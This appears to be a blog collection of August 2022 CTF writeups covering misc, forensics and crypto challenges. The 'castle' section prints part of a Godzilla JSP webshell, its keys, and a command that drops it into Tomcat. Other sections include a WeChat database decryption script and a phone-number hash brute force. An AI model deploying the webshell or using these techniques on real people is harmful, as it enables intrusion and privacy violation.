This post collects solution approaches for several competitions held in August 2022.

August 2022 competition writeups

Wangding Cup (网鼎杯) - Baihu (White Tiger)

2022 Wangding Cup, Baihu division

misc

sqlmapHell

Brute-forcing the archive password gives: 99114514

Extracting gives flag.7z and sys_account.csv. The former needs a password; the latter is a data table whose password column contains 7EqufFnrSGk=. Base64-decoding that and rendering the bytes as hex gives ec4aae7c59eb4869; looking this MD5 up gives nmy0612, which is the password of flag.7z. Inside is a text file that looks like Korean:

웬후ퟳ듳삨뫅뗘뛾튻튻뛾뻅뛾죽룜웟냋뗘쇹룜쯄쇣쇹쯄룜뻅웟웟쾸룜뇘웟죽뛾뻅웟뗘쾸쯄쯄뻅튻폒듳삨뫅

Running CyberChef's Text Encoding Brute Force (decode mode) shows that under the ISO 2022 Simplified Chinese (50227) encoding the text reads:

旗帜左大括号地二一一二九二三杠七八地六杠四零六四杠九七七细杠必七三二九七地细四四九一右大括号

Each word is a spelled-out character (旗帜 = flag, 左大括号 = {, 地 = d, 杠 = -, 细 = c, 必 = b, 右大括号 = }, the rest are digits), so converting gives: flag{d2112923-78d6-4064-977c-b73297dc4491}

tHXcode

Start by repairing the file header: the attachment is a PNG whose leading bytes are missing, so prepend 89504e47 and fix the extension. The image is a QR code, but scanning it only gives a link with nothing useful. Looking at the bit planes in StegSolve, bit plane 0 and bit plane 1 differ, so save both images and XOR them. The result has its four corners missing and looks like a cross, much like a QR code; that is a Han Xin code (汉信码) with its corner finders cut off. Fill in the modules the dots indicate, paste the four corner finders back on, and scan it with the 中国编码 (China Code) reader.

一个人自己的房间 (A Room of One's Own)

The downloaded archive asks for a password. Inspecting the encryption flag bytes in WinHex suggests pseudo-encryption, so change the 09 at the flag field to 00 and it extracts to 自己的房间.bmp. Its LSB plane contains a long run of 0s and 1s, exactly 108900 bits; sqrt(108900) = 330, so it is presumably a 330x330 QR code. Save the bits as a .bin, delete the trailing junk, and use the following script to render them as an image:

from PIL import Image

MAX = 330                      # sqrt(108900) = 330, so the bit string is a 330x330 image
bits = "[data..]"              # paste the 0/1 string extracted from the LSB plane here

img = Image.new("RGB", (MAX, MAX))
i = 0
for y in range(MAX):
    for x in range(MAX):
        # a '1' becomes a black pixel, a '0' a white one
        img.putpixel((x, y), (0, 0, 0) if bits[i] == "1" else (255, 255, 255))
        i += 1
img.show()
img.save("flag.png")

The result is a QR code whose four quadrants are scrambled. Save it, cut it into four pieces, reassemble them in PowerPoint and scan to get the flag.
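The pseudo-encryption fix at the start of this challenge (changing 09 to 00 at the flag field) can be done programmatically and more precisely. The script below is an added example written for this page, not the writeup author's code: it walks the zip's central directory and flips only bit 0 (the "encrypted" bit) of the general-purpose flag in every central and local file header, leaving bit 3 (data descriptor present) untouched, which is what zeroing the whole byte would destroy when the flag reads 0x0009. set_encryption_bit, fix_pseudo_encryption, build_zip and can_read are this example's own names, and the archive it builds is constructed sample data, not the challenge file.

```python
import io
import struct
import zipfile

LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
ENCRYPTED_BIT = 0x0001   # bit 0 of the general-purpose flag; bit 3 (0x0008) is the data-descriptor flag


def set_encryption_bit(data: bytes, encrypted: bool):
    """Set or clear bit 0 of the general-purpose flag in every central and local header.

    The central directory is located through the end-of-central-directory record and each
    entry's local header through its stored offset, so compressed data that happens to
    contain "PK" bytes is never touched. Returns (patched_bytes, number_of_fields_changed).
    """
    buf = bytearray(data)
    eocd = buf.rfind(EOCD_SIG)
    if eocd == -1:
        raise ValueError("no end-of-central-directory record")
    n_entries, _cd_size, cd_offset = struct.unpack_from("<HII", buf, eocd + 10)
    pos, changed = cd_offset, 0
    for _ in range(n_entries):
        if buf[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError(f"bad central header at {pos:#x}")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", buf, pos + 28)
        local_off = struct.unpack_from("<I", buf, pos + 42)[0]
        if buf[local_off:local_off + 4] != LOCAL_SIG:
            raise ValueError(f"bad local header at {local_off:#x}")
        # flag field sits at +8 in a central header and at +6 in a local header
        for hdr_pos in (pos + 8, local_off + 6):
            flags = struct.unpack_from("<H", buf, hdr_pos)[0]
            new = flags | ENCRYPTED_BIT if encrypted else flags & ~ENCRYPTED_BIT
            if new != flags:
                struct.pack_into("<H", buf, hdr_pos, new)
                changed += 1
        pos += 46 + name_len + extra_len + comment_len
    return bytes(buf), changed


def fix_pseudo_encryption(data: bytes):
    """Undo pseudo-encryption: clear bit 0 everywhere, keep every other flag bit."""
    return set_encryption_bit(data, False)


def build_zip(files: dict) -> bytes:
    """Constructed sample archive (no real password) used to demonstrate the fix."""
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return out.getvalue()


def can_read(data: bytes, name: str):
    """zipfile refuses entries flagged as encrypted (RuntimeError) unless a password is given."""
    try:
        return zipfile.ZipFile(io.BytesIO(data)).read(name)
    except RuntimeError:
        return None


if __name__ == "__main__":
    sample = build_zip({"flag.txt": b"flag{not_really_encrypted}"})
    pseudo, _ = set_encryption_bit(sample, True)       # simulate the challenge's pseudo-encryption
    print("flagged archive readable:", can_read(pseudo, "flag.txt"))
    fixed, n = fix_pseudo_encryption(pseudo)
    print("fields cleared:", n, "content:", can_read(fixed, "flag.txt"))
```

A genuinely encrypted entry would still fail after this fix (its data is ciphertext and a CRC check fails), which is how you tell pseudo-encryption from the real thing.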

Wangding Cup (网鼎杯) - Qinglong (Azure Dragon)

crypto

crypto091

Little A worked up the courage to ask the goddess for her phone number, but she insisted on testing him first. She said she had just read a paper published at the top security venue USENIX Security 2021 describing a vulnerability in Apple's AirDrop feature: it can leak the phone number and e-mail address of the AirDrop sender or receiver to strangers. With some effort Little A obtained the hash of her phone number transmitted during AirDrop, but got stuck there. Can you help him? All he remembers is that her number is a China Unicom number from the first batch released in the 170 range.
Hash: c22a563acc2a587afbfaaaa6d67bc6e628872b00bd7e998873881f7c6fdc62fc
Flag format: flag{13-digit phone number (digits only, including the country code)}
  • Approach

A quick search shows that China Unicom's first 170 numbers use the 1709 prefix, and the country code is 86, so the known part is 861709. The flag is 13 digits, leaving 7 unknown digits (10^7 candidates), and the 64-hex-character hash is SHA-256, so a brute force is cheap. Brute-force script:

import hashlib

target = "c22a563acc2a587afbfaaaa6d67bc6e628872b00bd7e998873881f7c6fdc62fc"
prefix = 8617090000000          # 86 + 1709 + seven unknown digits = 13 digits in total

for i in range(10_000_000):     # covers 0000000 .. 9999999
    phone = prefix + i
    if hashlib.sha256(str(phone).encode()).hexdigest() == target:
        print(phone)
        break

Guan'an Cup (观安杯)

2022 Guan'an Cup

misc

DISG

  • Approach

First mount the image with FTK Imager:

File -> Image Mounting -> select the image file -> Mount; a new disk appears.

(This may require write access: change the Mount Method to Block Device / Writable.)

Then analyse the disk with DiskGenius64. Select the newly added partition and look under

$RECYCLE.BIN\S-1-5-21-87142730-3356978945-767715265-500 on the new disk, where there is a docx file.

Copy it out, open it, and delete the picture inside to reveal the flag:

flag{v0kdk30g9lfif}

castle

  • Approach

Traffic analysis in Wireshark shows encrypted data starting at tcp.stream eq 197. Analysing it with BlueTeam_ABC_123.jar recovers part of the decrypted data; in tcp.stream eq 202 the webshell being written to disk is visible, base64-encoded:

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

Base64-decoding it gives what looks like an echo command:

echo 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 |base64 -d|gzip -d > /usr/local/tomcat/webapps/ROOT/logout.jsp

Tip: change the output path at the end and run the command on Linux to see the shell's contents directly.

<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%>


<% the rest of the shell was cut off %>

The key pieces of information are a password and the xc value. Together they suggest a Godzilla (哥斯拉) webshell, and from the earlier traffic the initial vulnerability was most likely Apache Shiro 550 deserialization (CVE-2016-4437):

String xc="3c6e0b8a9c15224a"; String pass="pass";

Then decrypt the Godzilla traffic with DecodertoWebshell_1.2.jar, using key 3c6e0b8a9c15224a and password pass.

Next look through the later requests whose body starts with pass=; in tcp.stream eq 204 the following request decrypts to a credential change:

S3UAFkPyuib0s8o70C5WxZ%2BPuwwqvopE8Ers8Ee176iSLmiyLiEL4yMpNM8Ytf8XK3lMRYzt6rh8kNGTjrAxKilWNdV5gX1vFLDcgGE2Roe9%2BfHDZQC7pHu3R%2BBf9vxWJ4rN3amilwKp5LcPOzGDISc0KMQP1ilPNu8b7ODrPB3S4a1ORPYBZcjA5LlpDtsq3bniXmkoSQ1QuG4wCNV8KQ%3D%3D

The decrypted result shows that the operator rotated credentials partway through: the new key is 57e7bebdf2501f02 and the new password is supersuperpassword:

path=/index.html
secretKey=57e7bebdf2501f02
evalClassName=org.apache.coyote.ser.std.SerializableSerializer
methodName=run
pwd=supersuperpassword

Then take the body of the last response in the capture:

4611012B612C3BAEPHCNu5r7f03UZyZQ5gQIbjDUiDIV3stT2ZcFdJ93TLGhwtWGNkxIaVxiqBTwpqYoGA6ZJz8w/UD9h2A0vwpkyA==C9331C0E8C9FA966

Decrypting it with the new key 57e7bebdf2501f02 and password supersuperpassword gives:

Decrypted response: flag{d3447f48-2691-4665-a1e3-3b281d56409e}
  • Tool download

Webshell traffic analysis tool:

https://github.com/minhangxiaohui/DecodeSomeJSPWebshell/releases/tag/v1.2

Great Wall Cup (长城杯)

2022 Great Wall Cup

misc

办公室爱情 (Office Romance)

A romance has broken out in the office. As onlookers we know that 沃德 (Word) loves 皮迪符 (PDF), and his love has an outer part and an inner part. 皮迪符's heart holds only 皮皮特 (PPT), but nobody knows what is in 皮皮特's heart. Come and find out who is there.
  • Approach

Inside the Word file, word/document.xml contains the two halves of the password:

password1:True_lOve_
password12:i2_supReMe
True_lOve_i2_supReMe

Use the concatenation (True_lOve_i2_supReMe) as the password for the PDF steganography in wbStego4.3; the extracted text this_is_pAssw0rd@! is the password of the archive.

A rainbow has 7 colours, so the colour strip is base 7: ignore white and map red, orange, yellow, green, cyan, blue, purple to 0-6 in that order, which reads off as

204 213 166 205 234 100 66 226 203 164 203 231 124 203 100 164 45 45 45 236

s='204a213a166a205a234a100a66a226a203a164a203a231a124a203a100a164a45a45a45a236a'
for i in s.split('a'):
    if i:
        print(chr(int(i, 7)), end='')

which prints flag{10ve_exCe1_!!!}

Peak Geek (巅峰极客)

2022 Peak Geek

misc

powerpower

Xiaoming's computer was hacked and the hacker maliciously modified his system registry. Can you find what was changed?
  • Approach

Open the registry hive in Registry Workshop and find these two keys and values:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DFS, , $enc_Secret=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
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared, , JFNlY3JldCA9ICd4eHh4eHh4eHh4eHh4eHgnCiRQYXNzcGhyYXNlID0gKEdldC1JdGVtUHJvcGVydHkgLVBhdGggYWFhYTpcU09GVFdBUkVcTWljcm9zb2Z0XEJpZEludGVyZmFjZSkKCiRrZXkgPSBbQnl0ZVtdXSgkUGFzc3BocmFzZS5QYWRSaWdodCgyNCkuU3Vic3RyaW5nKDAsMjQpLlRvQ2hhckFycmF5KCkpCgokU2VjcmV0IHwKICBDb252ZXJ0VG8tU2VjdXJlU3RyaW5nIC1Bc1BsYWluVGV4dCAtRm9yY2UgfCAKICBDb252ZXJ0RnJvbS1TZWN1cmVTdHJpbmcgLUtleSAka2V5IHwgCgo=

Base64-decoding the second value gives:

$Secret = 'xxxxxxxxxxxxxxx'
$Passphrase = (Get-ItemProperty -Path aaaa:\SOFTWARE\Microsoft\BidInterface)
$key = [Byte[]]($Passphrase.PadRight(24).Substring(0,24).ToCharArray())
$Secret |
  ConvertTo-SecureString -AsPlainText -Force |
  ConvertFrom-SecureString -Key $key |

Searching for the ConvertTo-SecureString documentation turns up the format of the -Key output, from which the decryption script follows:

#!/usr/bin/env python3
# ConvertFrom-SecureString -Key output: 32-char header + base64(UTF-16LE("2|base64(iv)|hex(ciphertext)"))
# The ciphertext is AES-CBC over the UTF-16LE secret with PKCS#7 padding; a 24-byte key means AES-192.
import base64
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes

SS_DEFAULT_HEADER = '76492d1116743f0423413b16050a5345'
SS_DEFAULT_ENCODING = 'utf_16_le'


def convert_from_secure_string(key, data, header=SS_DEFAULT_HEADER, enc=SS_DEFAULT_ENCODING, iv=None):
    """Mirror ConvertFrom-SecureString -Key: encrypt the secret and build the blob."""
    raw = data.encode(enc)
    padlen = 16 - (len(raw) % 16)
    raw += bytes([padlen]) * padlen
    if iv is None:
        iv = get_random_bytes(AES.block_size)
    ciphertext = AES.new(key, AES.MODE_CBC, iv).encrypt(raw)
    inner = '2|{0}|{1}'.format(base64.b64encode(iv).decode(), ciphertext.hex())
    return header + base64.b64encode(inner.encode(enc)).decode()


def convert_to_secure_string(key, data, header=SS_DEFAULT_HEADER, enc=SS_DEFAULT_ENCODING):
    """Mirror ConvertTo-SecureString -Key: parse the blob and return the decrypted secret."""
    fields = base64.b64decode(data[len(header):]).decode(enc).split('|')
    if len(fields) != 3 or fields[0] != '2':
        return None
    iv = base64.b64decode(fields[1])
    ciphertext = bytes.fromhex(fields[2])
    plain = AES.new(key, AES.MODE_CBC, iv).decrypt(ciphertext)
    plain = plain[:-plain[-1]]                      # strip PKCS#7 padding
    return plain.decode(enc)


if __name__ == '__main__':
    # 24-character key (per the PowerShell above it is the $Passphrase value padded/cut to 24 chars)
    key = b'F844A6035CF27CC4C90DFEAF'
    msg = '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'     # the $enc_Secret registry value
    print(convert_to_secure_string(key, msg, '76492d1116743f0423413b16050a5345'))
    # flag{Y0u_Are_thE_Master_0f_powershell}

easy_Forensic

Xiaoming accidentally sent the flag of his own challenge in WeChat. Can you find it?
  • Approach

On the desktop there is \Device\HarddiskVolume1\Users\Admin\Desktop\gift.jpg; dump it directly:

volatility -f secret.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000007d80a7d0 -D ./ -u

After fixing the image height, the archive password appears: Nothing_is_more_important_than_your_life!

wHeMscYvTluyRvjf5d7AEX5K4VlZeU2IiGpKLFzek1Q=

Base64-decode it and keep the result as hex:

c0778cb1c62f4e5bb246f8dfe5dec0117e4ae15959794d88886a4a2c5cde9354

Then dump wechat.txt from the desktop and save it as old.dat.

Following the WeChat database decryption article at https://mp.weixin.qq.com/s/4DbXOS5jDjJzM2PN0Mp2JA:

from Crypto.Cipher import AES
import hashlib, hmac, ctypes, sys, getopt

SQLITE_FILE_HEADER = bytes('SQLite format 3', encoding='ASCII') + bytes(1)
IV_SIZE = 16
HMAC_SHA1_SIZE = 20
KEY_SIZE = 32
DEFAULT_PAGESIZE = 4096
DEFAULT_ITER = 64000
opts, args = getopt.getopt(sys.argv[1:], 'hk:d:')
input_pass = ''
input_dir = ''

for op, value in opts:
    if op == '-k':
        input_pass = value
    elif op == '-d':
        input_dir = value

password = bytes.fromhex(input_pass.replace(' ', ''))

with open(input_dir, 'rb') as f:
    blist = f.read()
print(len(blist))
salt = blist[:16]                                          # the first 16 bytes of the file are the salt
key = hashlib.pbkdf2_hmac('sha1', password, salt, DEFAULT_ITER, KEY_SIZE)
first = blist[16:DEFAULT_PAGESIZE]
mac_salt = bytes([x ^ 58 for x in salt])
mac_key = hashlib.pbkdf2_hmac('sha1', key, mac_salt, 2, KEY_SIZE)
hash_mac = hmac.new(mac_key, digestmod='sha1')
hash_mac.update(first[:-32])
hash_mac.update(bytes(ctypes.c_int(1)))                    # page number 1, little-endian int

if hash_mac.digest() == first[-32:-12]:
    print('Decryption Success')
else:
    print('Password Error')
blist = [blist[i:i + DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]

with open(input_dir, 'wb') as f:
    f.write(SQLITE_FILE_HEADER)
    t = AES.new(key, AES.MODE_CBC, first[-48:-32])            # each page's IV sits just before its HMAC
    f.write(t.decrypt(first[:-48]))
    f.write(first[-48:])
    for i in blist:
        t = AES.new(key, AES.MODE_CBC, i[-48:-32])
        f.write(t.decrypt(i[:-48]))
        f.write(i[-48:])

Save the script above as dec.py and run:

1
python3 dec.py -k c0778cb1c62f4e5bb246f8dfe5dec0117e4ae15959794d88886a4a2c5cde9354 -d old.dat

Then strings old.dat | grep flag gives

klllflag{The_Is_Y0ur_prize}

Crypto

strange curve

There are many ways to represent an elliptic curve,do you know them?
  • Approach

Factoring directly gives a factor that decodes to the flag:

from Crypto.Util.number import *
print(long_to_bytes(56006392793427940134514899557008545913996191831278248640996846111183757392968770895731003245209281149))
# b'flag{b7f209df-1284-4bdf-b030-28197483c47b}'

point-power

Do you know Powerpoint?How about point-power?
  • Approach

We are given the x-coordinates x1 of a point G and x2 of 2G on y^2 = x^3 + a*x + b over GF(p). The doubling formula gives lambda = (3*x1**2 + a) / (2*y1) and x2 = lambda**2 - 2*x1; substituting y1**2 = x1**3 + a*x1 + b and clearing the denominator yields (x2 + 2*x1) * 4 * (x1**3 + a*x1 + b) = (3*x1**2 + a)**2, which can be solved directly for a. Run the following in Sage at https://sagecell.sagemath.org/:
from Crypto.Util.number import *
p = 3660057339895840489386133099442699911046732928957592389841707990239494988668972633881890332850396642253648817739844121432749159024098337289268574006090698602263783482687565322890623
b = 1515231655397326550194746635613443276271228200149130229724363232017068662367771757907474495021697632810542820366098372870766155947779533427141016826904160784021630942035315049381147
x1 = 2157670468952062330453195482606118809236127827872293893648601570707609637499023981195730090033076249237356704253400517059411180554022652893726903447990650895219926989469443306189740
x2 = 1991876990606943816638852425122739062927245775025232944491452039354255349384430261036766896859410449488871048192397922549895939187691682643754284061389348874990018070631239671589727
P.<a> = PolynomialRing(Zmod(p))
f = (x2+2*x1)*4*(x1**3+a*x1+b)-(3*x1**2+a)**2
f=f.monic()
a = f.roots()
print(a)
#[(918875439627055594259552478508551728381826199399685938622511660790511287097297184191298481453657480331998130281110691444641445094194011219176724349745237973925436007792522611119050, 1), (56006392793430010663016642098239513811260175999551893260401436587175373756825079518464264729364083325, 1)]
print(long_to_bytes(56006392793430010663016642098239513811260175999551893260401436587175373756825079518464264729364083325))
#b'flag{fa76cfb1-0052-4416-914d-91517bcebd52}'
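The same relation can be solved without Sage: it is a quadratic in a over GF(p), so one modular square root (Tonelli-Shanks) yields both roots. The script below is an added example written for this page, not the author's solution. p, b, x1 and x2 are the challenge values quoted above, p is assumed to be prime, and mod_sqrt, solve_quadratic_mod_p, recover_a, satisfies_doubling_relation and double_x are this example's own names; double_x checks a candidate a independently of the derivation by actually doubling the point and comparing with x2.

```python
# Challenge values (copied from the Sage script above); p is assumed prime.
p = 3660057339895840489386133099442699911046732928957592389841707990239494988668972633881890332850396642253648817739844121432749159024098337289268574006090698602263783482687565322890623
b = 1515231655397326550194746635613443276271228200149130229724363232017068662367771757907474495021697632810542820366098372870766155947779533427141016826904160784021630942035315049381147
x1 = 2157670468952062330453195482606118809236127827872293893648601570707609637499023981195730090033076249237356704253400517059411180554022652893726903447990650895219926989469443306189740
x2 = 1991876990606943816638852425122739062927245775025232944491452039354255349384430261036766896859410449488871048192397922549895939187691682643754284061389348874990018070631239671589727


def mod_sqrt(n, p):
    """Tonelli-Shanks: a square root of n modulo the odd prime p, or None for a non-residue."""
    n %= p
    if n == 0:
        return 0
    if pow(n, (p - 1) // 2, p) != 1:
        return None
    if p % 4 == 3:                              # fast path, valid for this challenge's p
        return pow(n, (p + 1) // 4, p)
    q, s = p - 1, 0
    while q % 2 == 0:
        q //= 2
        s += 1
    z = 2
    while pow(z, (p - 1) // 2, p) != p - 1:     # any quadratic non-residue
        z += 1
    m, c, t, r = s, pow(z, q, p), pow(n, q, p), pow(n, (q + 1) // 2, p)
    while t != 1:
        i, t2 = 0, t
        while t2 != 1:
            t2 = t2 * t2 % p
            i += 1
        bb = pow(c, 1 << (m - i - 1), p)
        m, c, t, r = i, bb * bb % p, t * bb * bb % p, r * bb % p
    return r


def solve_quadratic_mod_p(A, B, C, p):
    """Roots of A*a^2 + B*a + C = 0 over GF(p) (empty if the discriminant is a non-residue)."""
    s = mod_sqrt((B * B - 4 * A * C) % p, p)
    if s is None:
        return []
    inv_2A = pow(2 * A % p, -1, p)
    return sorted({(-B + s) * inv_2A % p, (-B - s) * inv_2A % p})


def recover_a(p, b, x1, x2):
    """Expand (x2+2x1)*4*(x1^3 + a*x1 + b) - (3x1^2 + a)^2 = 0 as a quadratic in a and solve it."""
    k = 4 * (x2 + 2 * x1) % p
    A = p - 1                                   # coefficient of a^2 is -1
    B = (k * x1 - 6 * x1 * x1) % p              # coefficient of a
    C = (k * (pow(x1, 3, p) + b) - 9 * pow(x1, 4, p)) % p
    return solve_quadratic_mod_p(A, B, C, p)


def satisfies_doubling_relation(p, b, x1, x2, a):
    return pow(3 * x1 * x1 + a, 2, p) == 4 * (x2 + 2 * x1) * (pow(x1, 3, p) + a * x1 + b) % p


def double_x(p, a, b, x):
    """x-coordinate of 2P for P = (x, y) on y^2 = x^3 + a*x + b; the sign of y does not matter."""
    y = mod_sqrt(pow(x, 3, p) + a * x + b, p)
    if y is None:
        raise ValueError("x is not the abscissa of a point on this curve")
    lam = (3 * x * x + a) * pow(2 * y, -1, p) % p
    return (lam * lam - 2 * x) % p


def long_to_bytes(n):
    return n.to_bytes((n.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    for a in recover_a(p, b, x1, x2):
        print(double_x(p, a, b, x1) == x2, long_to_bytes(a))
```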

Pengcheng Cup (鹏城杯)

2022 Pengcheng Cup

misc

简单取证 (Simple Forensics)

简单取证.zip

  • Approach

A memory forensics challenge; start by identifying the image with volatility imageinfo:

volatility -f file.raw imageinfo

Scan the whole image for file objects and filter for the desktop:

volatility  -f  file.raw --profile=WinXPSP2x86 filescan
volatility -f file.raw --profile=WinXPSP2x86 filescan |grep 桌面

Result:

Volatility Foundation Volatility Framework 2.6
0x0000000002072ea0 1 1 RW-rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\51763-4FE71AEA7-20220620-130010.raw
0x00000000020dd608 1 0 R--r-d \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\DumpIt.exe
0x0000000002162df8 3 1 R--rwd \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面
0x000000000224e028 1 1 R--rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面
0x0000000002325028 1 0 R--r-- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\secret.jpg
0x00000000023ac178 1 1 R--rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面
0x00000000023d5960 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\DumpIt.exe
0x000000000240d8d8 3 1 R--rwd \Device\HarddiskVolume1\Documents and Settings\All Users\桌面

Dump secret.jpg from the desktop; after the command a .dat file appears in the output directory:

volatility -f file.raw --profile=WinXPSP2x86 dumpfiles -Q 0x0000000002325028 --dump-dir=./

The file is base64 text ending in KP, i.e. a reversed PK zip signature, so base64-decode it and reverse the bytes to get a password-protected archive:

# base64-decode to a file, reversing the decoded bytes once
import base64
with open("beginfile", "r", encoding="utf8") as file:
    data = base64.b64decode(file.read())
with open("flag.zip", "wb") as out:
    out.write(data[::-1])

The password is in the command history:

volatility -f file.raw --profile=WinXPSP2x86 cmdscan

It shows Cmd #0 @ 0x35baa90: echo password = 62b041223bb9a, so the archive password is 62b041223bb9a.

Inside is a TXT file of what look like coordinates. On Kali start gnuplot and at the gnuplot> prompt run plot '<path to the saved TXT file>'; the plot is a QR code:

flag{a6b93e36-f097-11ec-a9b2-5254002d2b31}

babybit

The encryption start and end times are stored in the registry, so a backup of the registry was made for analysis, but the backup file was deleted by mistake. Can you help Xiaoming recover the deleted file and find the start and end time of the BitLocker encryption? Flag format: PCL{YYYY/MM/DD_HH:MM:SS_YYYY/MM/DD_HH:MM:SS}, start time first, end time second.
  • Approach

First mount the image with FTK Imager:

File -> Image Mounting -> select the image file -> Mount; a new disk appears.

(This may require write access: change the Mount Method to Block Device / Writable.)

Then analyse the disk with DiskGenius64. Select the newly added partition and look under

$RECYCLE.BIN\S-1-5-21-76198463-1691821667-776024894-1001 on the new disk, where there is a zip.

Load the recovered hive into Registry Explorer, following https://twitter.com/0gtweet/status/1418322629996564480:

Undocumented, never described #DFIR artifact containing the timestamp of BitLocker encryption. Easy to interpret with one-liner: ([datetime]::FromFileTime((Get-ItemProperty ("HKLM:\SYSTEM\CurrentControlSet\Control\FVEStats\")).'OsvEncryptInit'))
With horrible ACL though...

Find the FILETIME values under \SYSTEM\CurrentControlSet\Control\FVEStats\ and convert them in PowerShell:

[datetime]::FromFileTimeUTC("132995786261823536")
2022/6/13 7:23:46
[datetime]::FromFileTimeUTC("132995782594427750")
2022/6/13 7:17:39

These are UTC+0 times. Following the flag format PCL{YYYY/MM/DD_HH:MM:SS_YYYY/MM/DD_HH:MM:SS},

PCL{2022/06/13_07:17:39_2022/06/13_07:23:46} is rejected.

Accounting for the time zone means adding 8 hours; after a few more attempts it turns out the leading zero of the month must also be dropped, giving the flag

PCL{2022/6/13_15:17:39_2022/6/13_15:23:46}

Misc_water

  • Approach

binwalk extracts an image.

The original image also contains a JPEG trailer/signature stored backwards; locate the header, reverse the bytes, then extract the blind watermark:

java -jar BlindWatermark-v0.0.3-windows-x86_64.jar decode -f <extracted jpg> <output image for the watermark>

This yields the zip password: ZC4#QaWbW

Inside is a mosaic-like image; 010 Editor shows it is a PNG, so fix the extension.

Brute-forcing the width and height gives 733 and 698; patching them in reveals:

PCL{f0b31d6f9abc59f34815678c31d79178}

what_is_log

A machine's MySQL holds some secrets. From the log file, can you find the password that was typed, or the secret itself? (Submit in PCL{} format.)
  • Approach

On Kali, replay the capture and filter write events: sysdig -r flag2.scap evt.type=write | grep success

which gives the flag: PCL{1555a651a13ec074ce725383214fd7cc}

Linghang Cup (领航杯)

crypto

factor2

  • Approach

The same message is encrypted under one modulus n with three public exponents, so a common-modulus attack applies: extended Euclid gives coefficients with x1*e1 + x2*e2 = g12 and t1*g12 + x3*e3 = 1, and then m = c1^(x1*t1) * c2^(x2*t1) * c3^x3 mod n.

from gmpy2 import *

n = 14142010206099386143235977555692857399310494373372334255226213043954222671886219214790080363755519983589419573494262932031062165425660149023699589427423291076757673539031113758789961660789969074666728548356143546954548237178966812807683542026090314756465049840269239582841323515153189937744280883895942616355068450477244038093783025761830910527817275117470273068582606801561816182028771714266926279491448124072638544823523354972471012076902504991756879694948477398253632905720027515230565063830199860044535605314432273647912553716877788661706091962626029470938285869557993283863813783012548154763397158585969860496209
e1 = 8044170206501208651566242545498471362911890649958881015968520025930186294576023443506808099677296038797758573489705294289102108150592764180571398770862282775413964383616485564171756065468610971753771700993772575426420613330938626182989999507422559869431997096499661057456703567386749182728255894961711
c1 = 11517322714245526592044873592382373283428914348422645739336159016405003731268657488015847458779166523731678788259036486197351408324218938844963108776390284845014868126098529982171539875948326597563481747612010865265679909207769244324752454968172401384300433252342047155447253514663020084257315172025978213587941036806257025876560069777775117798912056950800470305039358493009376541529192357082470617915062674822440632959240104574498373020678875137349967659371746447815516349204225897744273956308472359601558104152900628002351072193856499370256139818744736463310402972428459727204523498170929275318085749369313370330104
e2 = 7981110843177277522743262582712207767500318326009118362192817529414323700650435360291001887232564132664914694220334201133850645107707193720930288877874115700468049318771691746592219604611120450612600603061311788240065247605723819417162805390035814213048743243801428908542140081097421519822132590047533
c2 = 12907231513900923422005862146378905589636791955213455533815625546155661275692081099543894853443339737652933422555561840945917851059973294781475696342510739464313686827430856742266071924616860913810640580296234473777303348248031669837803543965896443694327322478656672147536068477193332582821244877632320706358476947499828283809012293724747791713411303065091158644428874828519807586496004634361827049528190857803358038226873772036022804215684911051370929474550764142943510840488678370689581686370179457811111602201500802245275266633124851078915997894235280935026230159846619929979668248511374747926732890795947582868735
e3 = 8321945773137532897701269832287423438330975369722946793416731752574708023263908693097168458920645511451157398450278461406044452962800707032660103849647429968263806321843635237930345258217128805872313308435747131438472827261934005675575066641207582827978944766548998867180054428477087525524476746729443
